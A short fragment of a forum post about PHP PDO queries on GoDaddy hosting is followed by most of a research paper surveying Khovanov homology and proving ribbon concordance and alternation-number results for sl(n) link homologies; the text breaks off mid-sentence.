working -- "; print_r($row); No error -- how confusing. And I test this, works: <?php $pdo = new PDO('mysql:localhost;dbname=mydb', $user, $pass); $sth = $pdo->prepare('select * from mydb.tab limit 1'); $sth->execute(); $row = $sth->fetchAll(); echo '<pre>select * from test -- working !!! -- '; print_r($row); And now I come up with this solution, but not sure if it is Godaddy PDO bug? <?php $pdo = new PDO('mysql:localhost', $user, $pass); $sth = $pdo->prepare('use mydb'); $sth->execute(); $sth = $pdo->prepare('select * from tab limit 1'); $sth->execute(); $row = $sth->fetchAll(); echo '<pre>select * from test -- working !!! -- '; print_r($row); Conclusion: It looks like Godaddy PDO does not use dbname, you need to manually run 'use dbname' after new PDO and before any other SQLs
--- abstract: 'This paper begins with a survey of some applications of Khovanov homology to low-dimensional topology, with an eye toward extending these results to $\mathfrak{sl}(n)$ homologies. We extend Levine and Zemke’s ribbon concordance obstruction from Khovanov homology to $\mathfrak{sl}(n)$ homology for $n \geq 2$, including the universal $\mathfrak{sl}(2)$ and $\mathfrak{sl}(3)$ homology theories. Inspired by Alishahi and Dowlin’s bounds for the unknotting number coming from Khovanov homology and relying on spectral sequence arguments, we produce bounds on the alternation number of a knot. Lee and Bar-Natan spectral sequences also provide lower bounds on Turaev genus.' address: - 'Department of Mathematics, California State University, Fresno, CA 93740' - 'UCLA Department of Mathematics, 520 Portola Plaza, Los Angeles, CA 90095' - 'Department of Mathematics and Statistics, University of South Alabama, Mobile AL 36608' - 'Department of Mathematics and Statistics, Vassar College, Poughkeepsie, NY 12604' - 'Department of Mathematics, North Carolina State University, Raleigh, NC 27695' - 'Department of Mathematics, University of Georgia, Athens, GA 30602' author: - Carmen Caprau - Nicolle González - Christine Ruey Shan Lee - 'Adam M. Lowrance' - Radmila Sazdanović - Melissa Zhang bibliography: - 'references.bib' title: On Khovanov homology and related invariants --- Introduction ============ The discovery of the Jones polynomial [@Jones] has invigorated low-dimensional topology by introducing a plethora of link and 3-manifold invariants. Efforts to study these quantum invariants have yielded powerful new link invariants, in the form of homology theories, through categorification. In this article, we focus on the impact of the most influential homology theory arising from quantum invariants: Khovanov homology [@Kh00]. Our goal is to sample some recent applications of Khovanov-type theories to smooth low-dimensional topology. By bringing together the various ideas and constructions, we hope to facilitate new applications. In Section \[s.survey\], we curate a survey of recent developments in knot concordance, mutation detection, unknotting, and the categorification of knot polynomials. Note that our overview will focus on Lee’s spectral sequence and Rasmussen’s $s$-invariant, and generalizations of these constructions. We will exclude results linking Khovanov homology to knot Floer homology or Heegaard Floer homology, for which the readers may consult the resources [@OS05], [@Baldwin], [@LoZe]. We also exclude applications toward low-dimensional contact and symplectic geometry. Following the survey, we give two new applications. In Section \[s.homologyconcordance\], we extend Levine-Zemke’s [@LZ] ribbon concordance obstruction from Khovanov homology to $\mathfrak{sl}(n)$ homology for $n \geq 2$, as well as to universal $\mathfrak{sl}(2)$ and $\mathfrak{sl}(3)$ homology theories. More generally, we show that a ribbon concordance between links induces injective maps on link homologies defined via webs and foams modulo relations. Kang provides a different approach in [@Kang], where it is shown that a ribbon concordance induces injective maps on link homology theories that are multiplicative link TQFTs and which are either associative or Khovanov-like. Our proof relies mainly on the fact that all of the homology theories considered in Section \[s.homologyconcordance\] satisfy certain cutting neck and sphere relations in the category of dotted cobordisms, without the need to provide new definitions or develop special techniques. In Section \[section:Spectral\], we use spectral sequences coming from Khovanov homology to bound the alternation number, as well as the Turaev genus of a knot in $S^3$. We hope that this article provides a convenient reference to those entering this area of research and sparks interest in the subject. Acknowledgements {#acknowledgements .unnumbered} ---------------- We would like to thank ICERM and the organizers of the Women in Symplectic and Contact Geometry and Topology workshop (WiSCon) for the opportunity to work on this project during the summer of 2019. A survey of applications of Khovanov homology {#s.survey} ============================================= Rasmussen’s $s$-invariant ------------------------- Possibly the most well-known application of the original Khovanov homology [@Kh00] lies in Rasmussen’s [@Ras10] concordance invariant $s$, which comes from a spectral sequence arising from a filtration on the Lee complex. The Lee spectral sequence is a key ingredient of the proof that the Khovanov homology of alternating knots is thin [@Lee:Endo]. Rasmussen shows that $s$ induces a homomorphism from the concordance group to the integers. Therefore, it provides a slice obstruction. In fact, $s$ gives lower bounds on the slice genus of a knot. As an example of an application, he uses this to give a strikingly short proof of the Milnor conjecture, which was previously proven by Kronheimer and Mrowka using gauge theory [@KM-Khovanov-unknot]. Many others have since modeled the algebraic construction of Rasmussen’s invariant to produce more concordance invariants, many of which are generalizations of the $s$-invariant to $\mathfrak{sl}(n)$ homology ([@Lobb], [@Wu], [@Lobb2], [@Lewark]) or to the universal $\mathfrak{sl}(2)$ homology [@Caprau2012]. In 2012, Lipshitz and Sarkar introduced a stable homotopy type for Khovanov homology [@LS]. In [@LS-Sq], they define a refinement of $s$ for each stable cohomology operation, and show that the refinement corresponding to $Sq^2$ is in general stronger than $s$ (see also [@Seed-Sq]). Mutants ------- Mutant knots are notoriously difficult to distinguish using knot invariants. It has been shown that for a knot, mutation preserves the signature, the Alexander polynomial, the volume (if the mutants in question are hyperbolic), and the Jones polynomials [@CL99], [@Mor88], [@Rub87]. It is an open question whether Khovanov homology is invariant under mutation on knots. While there exist mutant *links* with distinct Khovanov homologies (see [@wehrli-03]), it has been shown that odd Khovanov homology and Khovanov homology with $\mathbb{F}_2$ coefficients are invariant under mutation; for details, we refer the reader to [@Blo10] and [@Weh10], respectively. There has been some recent indication that Khovanov-type theories may be used to distinguish mutants. For example, a prominent open problem was resolved when Piccirillo showed that the Conway knot is not slice, using the $s$-invariant [@Piccirillo] defined by Rasmussen from the spectral sequence from Khovanov homology to Lee homology. Lobb-Watson’s [@Lobb-Watson-involution] filtered invariant is able to detect mutants in the presence of an involution. In a different direction, one may also consider generalized mutations along genus 2 surfaces from which (Conway) mutation may be recovered. It has been shown that Khovanov homology distinguishes a pair of generalized mutants, while the signature, HOMFLY-PT polynomial, Jones polynomials, and Kauffman polynomial are the same [@DGST10]. Ribbon Concordance ------------------ Motivated by Gordon’s conjecture [@Gordon-ribbon] that ribbon concordance gives a partial ordering on knots in $S^3$, there has been great interest in studying the behavior of knot invariants under ribbon concordance. Notably, in 2019, Zemke [@Zemke-ribbon-HFK] showed that knot Floer homology obstructs ribbon concordance. This led to an exciting series of papers extending this result to various homology-type invariants for knots. Within the realm of Khovanov-type invariants, Levine-Zemke [@LZ] extended the result to the original Khovanov homology, Kang [@Kang] extended the result to a setup that includes Khovanov-Rozansky homologies [@KR08], knot Floer homologies and other theories, and Sarkar [@Sarkar-ribbon] defined the notion of ribbon distance and derived bounds on this from Khovanov-Lee homology. Unknotting and unlinking via spectral sequences ----------------------------------------------- Besides the $s$-invariant and its relationship to the slice genus, one can also relate spectral sequences from Khovanov homology to other link invariants. Alishahi and Dowlin [@AD:Lee] proved that the page at which the Lee spectral sequence collapses can be used to give a lower bound on the unknotting number of the knot. A consequence of this bound is that the Knight Move conjecture holds for all knots with unknotting number at most two. Alishahi also proved a similar lower bound for the unknotting number using the Bar-Natan spectral sequence coming from the characteristic two Khovanov homology [@Alishahi:BN]. In another direction, Batson and Seed [@BS:LinkSplit] constructed a spectral sequence starting with the Khovanov homology of a link and converging to the Khovanov homology of the disjoint union of its components. The page at which this spectral sequence collapses yields a lower bound on the link splitting number of the link. $\mathfrak{sl}(n)$ homology and HOMFLY-PT homology -------------------------------------------------- For each $n$, the $\mathfrak{sl}(n)$ link invariant is a certain one-variable specialization of the HOMFLY-PT polynomial. In [@KR08], Khovanov and Rozansky gave a categorifiction of the $\mathfrak{sl}(n)$ polynomial using matrix factorizations. Moreover, using matrix factorizations with a different potential, Khovanov and Rozansky [@KR082] constructed a categorification of the HOMFLY-PT polynomial. For the $\mathfrak{sl}(3)$ link invariant, Khovanov [@Kh04] constructed another categorification using trivalent webs and foams between such webs. This was later generalized to the universal $\mathfrak{sl}(3)$ homology by Mackaay and Vaz [@MV07]. An approach to the universal $\mathfrak{sl}(2)$ homology theory was constructed by Caprau [@Caprau09], using a combination of ideas from [@BN05] and [@Kh04]. In [@MSV], Mackaay, Stosic, and Vaz gave a topological categorification of the $\mathfrak{sl}(n)$ polynomial, for all $n\geq 4,$ via webs and a special type of foams. For specific details on the versions of $\mathfrak{sl}(n)$ homologies that are used in this paper, we refer the reader to Section \[s.homologyconcordance\]. A potential topological application of $\mathfrak{sl}(n)$ and HOMFLY-PT homologies is that they would be better able to distinguish mutant knots, due in part to the fact that the corresponding decategorifications can detect mutants [@Morton], [@MortonRyder]. Link homologies and ribbon concordance {#s.homologyconcordance} ====================================== Let $L_0$ and $L_1$ be links in $S^3$. A *concordance* $C \subset S^3\times [0,1]$ from $L_0$ to $L_1$ is an embedding $f: S^1 \times [0,1] \to S^3 \times [0, 1]$ such that $f(S^1 \times \{0\}) = L_0 \times \{0\}$ and $f(S^1 \times \{1\}) = L_1 \times \{1\}$. In this case, we say that the links $L_0$ and $L_1$ are *concordant*. By a small isotopy of $S^3\times [0,1]$, the concordance $C$ may be adjusted so that the restriction to $C$ of the projection $S^3\times [0,1] \to [0,1]$ is a Morse function. If this Morse function has only critical points of index $0$ (local minima) and $1$ (saddle points) (that is, if it has no critical points of index $2$ (local maxima)), then $C$ is called a *ribbon concordance*. In this case, we say that $L_0$ is *ribbon concordant* to $L_1$. Denote by $\overline{C}$ the mirror image of $C$ and regard it as a concordance from $L_1$ to $L_0$. Then $\overline{C} \circ C$ is the concordance from $L_0$ to itself obtained by concatenating $C$ and $\overline{C}$. Zemke [@Zemke-ribbon-HFK] proved that the concordance $\overline{C} \circ C$ can be obtained by taking the identity concordance $L_0 \times [0, 1]$ and “tubing in” unknotted, unlinked $2$-spheres $S_1, \dots, S_n$ using “tubes" $T_1, \dots, T_n$. The tubes are annuli embedded in $S^3 \times [0, 1]$, joining $L_0 \times [0, 1]$ with the spheres $S_1, \dots, S_n$. Specifically, Zemke [@Zemke-ribbon-HFK] explained that the concordance $\overline{C} \circ C$ can be described, up to isotopy, by the following movie presentation: - $n$ births of disjoint unknots $U_1, \dots , U_n$, each of which being disjoint from the link $L_0$; - $n$ saddles represented by bands $B_1, \dots , B_n$, such that $B_i$ connects $U_i$ with $L_0$; - $n$ saddles represented by bands $\overline{B}_1, \dots , \overline{B}_n$, where each $\overline{B}_i$ is respectively the mirror image (dual) of $B_i$; - $n$ deaths, deleting $U_1, \dots , U_n$. The embedded annuli $T_i$ are obtained by concatenating the second and third movie frames above, that is, by joining the bands $B_i$ together with their respective dual bands, $\overline{B}_i$. The births and deaths of the unknots $U_1, \dots , U_n$ determine $n$ unknotted, unlinked $2$-spheres $S_1, \dots, S_n$. The annuli $T_i$ are the boundaries of some three-dimensional $1$-handles $h_i$, and each handle $h_i$ intersects the surface $L_0 \times [0, 1]$ and the sphere $S_i$ in some disks $D_i$ and $D_i'$, respectively. Then, the concordance $\overline{C} \circ C$ can be thought of as the following union: $$\overline{C} \circ C = \big ((L_0 \times [0, 1]) \diagdown (D_1 \cup \dots \cup D_n) \big ) \cup (T_1 \cup \dots \cup T_n)\cup \big ((S_1 \diagdown D_1') \cup \dots \cup (S_n \diagdown D_n') \big ).$$ The goal of this section is to use the above result by Zemke [@Zemke-ribbon-HFK] to show that a ribbon concordance between two links induces an injective map on $\mathfrak{sl}(n)$ link homologies, for all $n \geq 2$. That is, we want to show that the main result proved by Levine and Zemke in [@LZ] can be generalized to universal Khovanov homology, as well as to higher rank link homologies. The proofs of the following statements are similar in nature to the proofs of the analogous statements provided in [@LZ]. Here we are considering $\mathfrak{sl}(n)$ foam homologies, which we will denote by $\mathcal{H}_n$. For $n=2$ and $n = 3$, we are working with the corresponding universal theories (‘universal’ in the sense as explained by Khovanov’s work [@Kh06]). The universal theory categorifying the $\mathfrak{sl}(2)$ link polynomial corresponds to a Frobenius system of rank two associated to the ring $\mathcal{A}_2 = \mathbb{Z}[X, h, t]/(X^2 - hX -t)$, where $h$ and $t$ are formal parameters. The homology of the unknot is the ring $\mathcal{A}_2$, and the homology of that of the empty link is the ground ring $\mathbb{Z}[X, h, t]$. To obtain a homology theory that is purely functorial with respect to link cobordisms, Caprau [@Caprau09] worked with singular cobordisms and with the ground ring $\mathbb{Z}[i][X, h, t]$, where $i^2 = -1$. Similarly, the universal $\mathfrak{sl}(3)$ foam theory, introduced by Mackaay and Vaz in [@MV07], corresponds to a Frobenius system of rank three associated to the ring $\mathcal{A}_3 = \mathbb{Z}[X, a, b, c]/(X^3-aX^2-bX-c)$, where $a, b$, and $c$ are formal parameters. The work in [@MV07] generalizes Khovanov’s construction in [@Kh04]. For $n \geq 4$, we consider the homology theory introduced by Mackaay, Stošić, and Vaz in [@MSV], which corresponds to the ring $\mathcal{A}_n = \mathbb{Q}[X]/(X^n)$. The foams in [@MSV] are more complicated than those for the cases of $n = 2$ and $3$, as these foams have additional types of singularities and their evaluation makes use of the Kapustin-Li formula [@KaLi]. These homology theories use foams modulo local relations, as pioneered by Bar-Natan [@BN05] in his approach to local Khovanov homology for tangles. In each case of the $\mathfrak{sl}(n)$ homology theory considered here for a fixed value of $n \geq 2$, one associates to a link diagram a formal chain complex in a certain abelian category $\text{Kom}(\textbf{Foam}_n)$, whose objects are column vectors of closed $1$-manifolds in the plane, and whose morphisms are matrices of dotted foams in $\mathbb{R}^2 \times [0, 1]$, which are considered up to boundary-preserving isotopies, and modulo local relations. For our purpose, for each $\mathfrak{sl}(n)$ foam homology theory for $n \geq 2$, we will only need the local relations involving ordinary surfaces and (1+1)-cobordisms in $\mathbb{R}^2 \times [0, 1]$ marked with dots. Specifically, we will employ the sphere relations (S$_n$) and the cutting neck relation (CN$_n$), for fixed $n \geq 2$, depicted in Fig. \[local relations\]. In this figure, a letter $i$ on a surface means that the surface is marked with $i$ dots. Recall that in terms of the $2$-dimensional TQFT associated with the corresponding Frobenius extension and the resulting $\mathfrak{sl}(n)$ homology theory for links, a dot on a surface corresponds to the endomorphism of the ring $\mathcal{A}_n$ that is multiplication by $X$. The sphere relations (S$_n$) are the geometric counterparts of the evaluations of the counit map $\epsilon: \mathcal{A}_n \to R$ on the generators $1, X, \dots , X^{n-1}$, where $R$ is the ground ring. Moreover, the cutting neck relation (CN$_n$), for each $n\geq 2$, is the geometric representation of the formula for $\Delta(1)$, where $\Delta: \mathcal{A}_n \to \mathcal{A}_n \otimes_R \mathcal{A}_n$ is the comultiplication map corresponding to the Frobenius system defining the $2$-dimensional TQFT. $$\begin{picture}(30,30) \raisebox{3pt}{\scalebox{0.25}{\includegraphics{sphere}}} \put(-15,21){\fontsize{9}{10.8}$i$} \end{picture} \raisebox{12pt}{\ \ = \ $\begin{cases} 1,\ \ i = n - 1 \\ 0, \ \ \text{otherwise} \end{cases}$ \quad (S$_n$) } \hspace{1.5cm} \raisebox{-25pt}{\includegraphics[height = 0.85in]{cyl}} = \sum_{i = 0}^{n-1} \raisebox{-25pt}{\includegraphics[height = 0.85in]{cn-right}} \quad (\text{CN}_n)$$ We denote by $\mathcal{T}_n$, for $n \geq 2$, the tautological functors in the above homology theories. Recall that these functors are multiplicative with respect to disjoint unions of objects, as well as with respect to disjoint unions of morphisms, in the geometric categories $\textbf{Foam}_n$, for $n \geq 2$. It was proved in [@Caprau09] that the universal $\mathfrak{sl}(2)$ homology theory satisfies the functoriality property with respect to link (and tangle) cobordisms without sign ambiguity. Clark [@Cl] also proved that Khovanov’s $\mathfrak{sl}(3)$ homology theory is properly functorial. Moreover, it was explained in [@MV07] that the universal $\mathfrak{sl}(3)$ homology theory is functorial at least up to a minus sign (that is, up to multiplication by a unit in $\mathbb{Z}$). Finally, recall that the $\mathfrak{sl}(n)$ homology theory, for $n \geq 4$, is functorial (at least) up to multiplication by a non-zero complex number, as shown in [@MSV]. Note that for the purpose of this paper, it suffices that a certain $\mathfrak{sl}(n)$ foam homology theory is functorial up to multiplication by a unit in the ground ring. For the remainder of this section, embedded link cobordisms in $\mathbb{R}^3 \times [0, 1]$ may possibly be decorated with dots. \[spheres-cob\] Let $F \subset \mathbb{R}^3 \times [0, 1]$ be an embedded cobordism from a link $L_0$ to a link $L_1$. Let $S$ be an unknotted $2$-sphere in $\mathbb{R}^3 \times [0, 1]$ and unlinked from $F$, and denote by $S^{(k)}$ the sphere $S$ marked with $k$ dots. Then, 1. $\mathcal{H}_2(F \cup S) = 0$ and $\mathcal{H}_2(F \cup S^{(1)}) = \mathcal{H}_2(F)$. 2. $\mathcal{H}_3(F \cup S) = 0 = \mathcal{H}_3(F \cup S^{(1)})$ and $\mathcal{H}_3(F \cup S^{(2)}) = - \mathcal{H}_3(F)$. 3. $\mathcal{H}_n(F \cup S) = \mathcal{H}_n(F \cup S^{(1)}) = \dots = \mathcal{H}_n(F \cup S^{(n-2)}) = 0$, and $\mathcal{H}_n(F \cup S^{(n-1)}) = \mathcal{H}_n(F)$, where $n \geq 4$. If necessary, we may perform an ambient isotopy of $\mathbb{R}^3 \times [0, 1]$ so that the unknotted $2$-sphere $S$ lies in a slice $\mathbb{R}^3 \times \{t\}$, for some $t \in [0,1]$, and that the intersection of $F$ with $\mathbb{R}^3 \times \{t\}$ is a $(1+1)$-cobordism. Then, the result in part (a) follows from the sphere relations (S$_2$) and the properties of the functors $\mathcal{T}_2$ and $\mathcal{H}_2$. Similarly, the sphere relations (S$_3$) and separately (S$_n$), for $n \geq 4$, together with the application of the functors $\mathcal{T}_3$ and $\mathcal{T}_n$, for $n \geq 4$, (along with the fact that $\mathcal{H}_3$ and $\mathcal{H}_n$ are functors) yield the equalities in parts (b) and (c). \[tubes-cobs\] Let $F \subset {\mathbb{R}}^3 \times [0,1]$ be an embedded cobordism from a link $L_0 \subset {\mathbb{R}}^3 \times \{0\}$ to a link $L_1 \subset {\mathbb{R}}^3 \times \{1\}$. Let $\gamma$ be a smoothly embedded arc with endpoints on $F$ and otherwise disjoint from $F$, and let $T$ be the boundary of an embedded tubular neighborhood of $\gamma$ (that is, $T$ is an annulus). Let $F'$ be the result of removing the neighborhood of $\partial \gamma$ from $F$ and attaching $T$. Denote by $F^{(i, j)}$ the cobordism obtained from $F'$ by surgery along a non-trivial compressing disk of $T$. Then, 1. $\mathcal{H}_2(F') = \mathcal{H}_2(F^{(1, 0)}) + \mathcal{H}_2(F^{(0, 1)}) -h \, \mathcal{H}_2(F)$. 2. $ - \mathcal{H}_3(F') = \mathcal{H}_3(F^{(2, 0)}) + \mathcal{H}_3(F^{(1, 1)}) + \mathcal{H}_3(F^{(0, 2)})$ $ - a [\mathcal{H}_3(F^{(1, 0)}) + \mathcal{H}_3(F^{(0, 1)})] - b \mathcal{H}_3(F)$. 3. $\mathcal{H}_n(F') = \displaystyle \sum_{i = 0}^{n-1} \mathcal{H}_n(F^{(i, n- 1 -i)})$, where $n \geq 4$. The proof is similar to that of Lemma \[spheres-cob\], only that now we make use of the cutting neck relations. We perform first an isotopy of $\mathbb{R}^3 \times [0, 1]$ so that $T$ lies in a small ball contained in a slice $\mathbb{R}^3 \times \{t\}$, for some $t \in [0,1]$, and the intersections of $F'$ and $F^{(i, j)}$ with the ball can be identified with the pictures depicted in the cutting neck relations. The cutting neck relations imply that the morphisms in $\textbf{Foam}_n$ corresponding to the cobordisms in the statement of the lemma (where $n = 2$ in part (a), $n = 3$ in part (b), and $n \geq 4$ in part (c)) satisfy the skein relations in the statement. Then, the claimed identities on the homology groups follow at once from these, and from the properties of the tautological functors $\mathcal{T}_n$, and since $\mathcal{H}_n$ is a functor, for each $n \geq 2$. \[cutting annulus\] Let $D \subset {\mathbb{R}}^3 \times [0,1]$ be an embedded cobordism from a link $L_0 \subset {\mathbb{R}}^3 \times \{0\}$ to a link $L_1 \subset {\mathbb{R}}^3 \times \{1\}$. Suppose $S$ is an unknotted $2$-sphere in ${\mathbb{R}}^3 \times [0,1]$ and unlinked from $D$. Let $\gamma$ be a smoothly embedded arc with one endpoint on $F$ and the other on $S$, and otherwise disjoint from $D \cup S$, and let $T$ be the boundary of an embedded tubular neighborhood of $\gamma$ (that is, $T$ is an annulus). Let $D'$ be the result of removing the neighborhood of $\partial \gamma$ from $D \cup S$ and attaching $T$. Then $\mathcal{H}_n(D') = \mathcal{H}_n(D)$, for all $n \geq 2$. The proof follows from Lemmas \[spheres-cob\] and \[tubes-cobs\]. We apply first Lemma \[tubes-cobs\] to the cobordism $F: = D \cup S$, with $F': = D'$. Then note that $F^{(i, j)} = D^{(i)} \cup S^{(j)}$, where $D^{(i)}$ is the cobordism $D$ marked with $i$ dots, and $S^{(j)}$ is the 2-sphere $S$ marked with $j$ dots. So, we have $$\begin{aligned} \mathcal{H}_2(D') &=& \mathcal{H}_2(D^{(1)} \cup S) + \mathcal{H}_2(D \cup S^{(1)}) -h \, \mathcal{H}_2(D \cup S)\\ &=& 0 + \mathcal{H}_2(D) -h \cdot 0\\ &=& \mathcal{H}_2(D) ,\end{aligned}$$ where the second equality holds due to part (a) in Lemma \[spheres-cob\]. Similarly, using part (b) from Lemma \[tubes-cobs\], we get, $$\begin{aligned} - \mathcal{H}_3(D') &=& \mathcal{H}_3(D^{(2)} \cup S) + \mathcal{H}_3(D^{(1)} \cup S^{(1)}) + \mathcal{H}_3(D \cup S^{(2)})\\ &&- a [\mathcal{H}_3(D^{(1)} \cup S) + \mathcal{H}_3(D \cup S^{(1)})] - b \mathcal{H}_3(D \cup S).\end{aligned}$$ Using part (b) from Lemma \[spheres-cob\], we see that only the third term above, $\mathcal{H}_3(D \cup S^{(2)})$, survives and equals to $-\mathcal{H}_3(D)$. Hence, $ \mathcal{H}_3(D') = \mathcal{H}_3(D)$, as desired. Moreover, the following equalities follow from parts (c) of the previous two lemmas: $$\begin{aligned} \mathcal{H}_n(D') = \sum_{i = 0}^{n-1} \mathcal{H}_n(D^{(i)} \cup S^{(n- 1 - i)}) =\mathcal{H}_n(D \cup S^{(n-1)}) + 0= \mathcal{H}_n(D).\end{aligned}$$ Hence, the statement holds for every $n \geq 2$. We are now ready to prove the main result of this section. \[induced injective map\] Let $C$ be a ribbon concordance from a link $L_0$ to a link $L_1$. Then the induced maps on $\mathfrak{sl}(n)$ homologies $$\mathcal{H}_n (C) : \mathcal{H}_n (L_0) \to \mathcal{H}_n (L_1)$$ are injective, for all $n \geq 2$. Let $C$ be a ribbon concordance from $L_0$ to $L_1$, and let $\overline{C}$ be the mirror image of $C$ (that is, $\overline{C}$ is the reverse concordance from $L_1$ to $L_0$). Let $D: = \overline{C} \circ C $. Then $D$ is a concordance from $L_0$ to itself. Since for each $n \geq 2$, the foam homology theory $\mathcal{H}_n$ is a functor, we have that: $$\mathcal{H}_n (D) = \mathcal{H}_n (\overline{C}) \circ \mathcal{H}_n(C), \, \text{for each} \, n \geq 2.$$ By the discussion at the beginning of this section, we know that the concordance $D$ can be obtained by taking the identity concordance $L_0 \times [0, 1]$ and “tubing in” unknotted, unlinked $2$-spheres $S_1, \dots, S_n$ using embedded annuli $T_1, \dots, T_n$. These annuli are the boundaries of embedded 3-dimensional 1-handles $h_1, \dots, h_i$ in $\mathbb{R}^3 \times[0, 1]$, where each $h_i$ connects $L_0 \times [0, 1]$ with $S_i$ and is disjoint from $S_j$, for $j \neq i$. Then, by Proposition \[cutting annulus\] and the functoriality properties of the corresponding foam homology theories, we get: $$\mathcal{H}_2(D) = \mathcal{H}_2(L_0 \times [0, 1]) = \text{id}_{\mathcal{H}_2(L_0)},$$ $$\mathcal{H}_3(D) = \pm \mathcal{H}_3(L_0 \times [0, 1]) = \pm \text{id}_{\mathcal{H}_3(L_0)}, \,\, \text{and}$$ $$\mathcal{H}_n(D) = q \, \mathcal{H}_n(L_0 \times [0, 1]) = q \, \text{id}_{\mathcal{H}_n(L_0)}, \,\, \text{for all} \,\, n \geq 4,$$ where $q \in \mathbb{Q}^*$. Therefore, $$\mathcal{H}_2(\overline{C}) \circ \mathcal{H}_2(C) = \text{id}_{\mathcal{H}_2(L_0)}, \,\, \mathcal{H}_3(\overline{C}) \circ \mathcal{H}_3(C) = \pm \text{id}_{\mathcal{H}_3(L_0)}, \, \, \text{and}$$ $$\mathcal{H}_n(\overline{C}) \circ \mathcal{H}_n(C) = q \, \text{id}_{\mathcal{H}_n(L_0)}, \,\, \text{for some} \, q \in \mathbb{Q}^*.$$ In all of the above cases, the composition $\mathcal{H}_n(\overline{C}) \circ \mathcal{H}_n(C)$ is a bijective function, for each $n \geq 2$. Hence for each $n \geq 2$, $\mathcal{H}_n(C)$ is an injective map and $\mathcal{H}_n(\overline{C})$ is surjective. As a consequence of Theorem \[induced injective map\], we obtain that the homology theories $\mathcal{H}_n$, for all $n \geq 2$, give obstructions to ribbon concordance. For any concordance $C$ between links and any $n \geq 2$, the map $\mathcal{H}_n(C)$ preserves both the quantum and homological grading. Then the proof of the theorem implies that for any bigrading $(i, j)$ and $n \geq 2$, $\mathcal{H}_n^{i, j}(L_0)$ embeds in $\mathcal{H}_n^{i, j}(L_1)$ as a direct summand. Gordian distance and spectral sequences in Khovanov homology {#section:Spectral} ============================================================ Lee [@Lee:Endo] defined an endomorphism of the Khovanov homology of a knot with coefficients in $\mathbb{Q}$, and Rasmussen [@Ras10] showed that Lee’s endomorphism gives rise to a spectral sequence, called the Lee spectral sequence, whose $E_1$ page is isomorphic to the Khovanov homology of the knot. Shumakovitch [@Shumakovitch:Torsion] defined a version of Lee’s spectral sequence with coefficients in the finite field $\mathbb{F}_p$ of order $p$, for an odd prime $p$. We refer to the above spectral sequences as the Lee spectral sequence with $R$ coefficients, where $R$ is either $\mathbb{Q}$ or $\mathbb{F}_p$ for an odd prime $p$. A spectral sequence *collapses* at the $k$th page if $E_{k-1}\neq E_k$ and $E_k=E_m$ for all $m\geq k$. When $R=\mathbb{Q}$ or $\mathbb{F}_p$, define ${p_{\textnormal{Lee}}}(K;R)$ to be the page at which the Lee spectral sequence with $R$ coefficients collapses. Similarly, Bar-Natan [@BN05] defined a variant of Khovanov homology with $\mathbb{F}_2$ coefficients. Turner [@Turner:BN] showed that Bar-Natan’s variant gives rise to a spectral sequence similar in spirit to the Lee spectral sequence. Define $\pBN(K)$ to be the page at which the Bar-Natan spectral sequence collapses. The *Gordian distance* $d(K_1,K_2)$ between two knots $K_1$ and $K_2$ is the minimum number of crossing changes necessary to transform $K_1$ into $K_2$. The most famous Gordian distance is the *unknotting number* $u(K)$ of a knot $K$, which is the Gordian distance between $K$ and the unknot. Kawauchi [@Kawauchi:Alternation] similarly defined the *alternation number* $\alt(K)$ of a link $K$ to be the minimum Gordian distance between $K$ and the set of alternating knots. The Khovanov homology $Kh(K;R)$ of a knot over $R$ is *homologically thin* if there is an integer $s$ such that $Kh^{i,j}(K;R)=0$, for $j-2i\neq s\pm 1$; that is, $Kh(K;R)$ is homologically thin if $Kh(K;R)$ is supported entirely in two adjacent diagonals $j-2i = s\pm1$. Define ${d_{\textnormal{thin}}}(K;R)$ to be the minimum Gordian distance between $K$ and the set of knots that have thin Khovanov homology over $R$. Because every alternating link has thin Khovanov homology over $R$, for all rings $R$ that we consider, it follows that ${d_{\textnormal{thin}}}(K;R)\leq \alt(K)$. This section is organized as follows: the results in Subsection \[s41\] are followed by examples in Subsection \[s42\], which illuminate the proofs provided in Subsection \[s43\]. Results {#s41} ------- For any real number $x$, define $\lceil x \rceil$ to be the ceiling of $x$; that is, $\lceil x \rceil$ is the least integer that is greater than or equal to $x$. The next two results relate ${d_{\textnormal{thin}}}(K;R)$ and $\alt(K)$ with the pages ${p_{\textnormal{Lee}}}(K;R)$, $\pBN(K)$ at which the Lee and Bar-Natan spectral sequences collapse. \[theorem:LeeMain\] Let $K$ be a knot, and let $R$ be $\mathbb{Q}$ or $\mathbb{F}_p$, where $p$ is an odd prime. Then $$\label{ineq:LeeBound} {p_{\textnormal{Lee}}}(K;R) \leq \left\lceil \frac{{d_{\textnormal{thin}}}(K;R)+3}{2}\right\rceil \leq \left\lceil \frac{\alt(K)+3}{2}\right\rceil.$$ \[theorem:BNMain\] Let $K$ be a knot. Then $$\label{T3} \pBN(K)\leq {d_{\textnormal{thin}}}(K;\mathbb{F}_2)+2\leq \alt(K)+2.$$ The Turaev genus of a knot is an invariant that measures how far a knot is from being alternating in a different way than the alternation number, and it is defined as follows. Each knot diagram $D$ has a Turaev surface of genus $$g_T(D)=\frac{1}{2}(2+c(D)-s_A(D)-s_B(D)),$$ where $c(D)$ is the number of crossings in $D$, and $s_A(D)$ and $s_B(D)$ are the number of components in the all-$A$ and, respectively, all-$B$ Kauffman states of $D$. The *Turaev genus* $g_T(K)$ of a knot $K$ is defined as follows: $$g_T(K) = \min \{g_T(D)~|~D~\textnormal{is a diagram of}~K\}.$$ It is known that a knot is alternating if and only if its Turaev genus is zero [@Turaev:Simple]. The next result is a version of Theorems \[theorem:LeeMain\] and \[theorem:BNMain\]. \[theorem:Turaev\] Let $R=\mathbb{Q}$ or $\mathbb{F}_p$ for an odd prime $p$. For any knot $K$, $$2{p_{\textnormal{Lee}}}(K;R) \leq g_T(K)+4 \qquad \textnormal{and} \qquad \pBN(K) \leq g_T(K) + 2.$$ There are knots with arbitrarily large Turaev genus and alternation number one [@Lowrance:AltDist]. Also, there are knots with Turaev genus one that are conjectured to have arbitrarily large alternation number, and the existence of such knots would show that Theorem \[theorem:Turaev\] does not immediately follow from Theorems \[theorem:LeeMain\] and \[theorem:BNMain\]. We first give examples of how Theorems \[theorem:LeeMain\] and \[theorem:BNMain\] can be used, and then we prove each result. Examples {#s42} -------- Either side of the inequalities in Theorems \[theorem:LeeMain\] and \[theorem:BNMain\] can provide insight into the other. Example \[example:AH\] gives a family of knots all of whose alternation numbers are one, but whose Khovanov homology becomes more and more complicated in terms of width. Despite having complicated Khovanov homology, Theorem \[theorem:LeeMain\] implies that the Lee spectral sequence for this family of knots collapses at or before the second page, and Theorem \[theorem:BNMain\] implies that the Bar-Natan spectral sequence collapses at or before the third page. We remark that 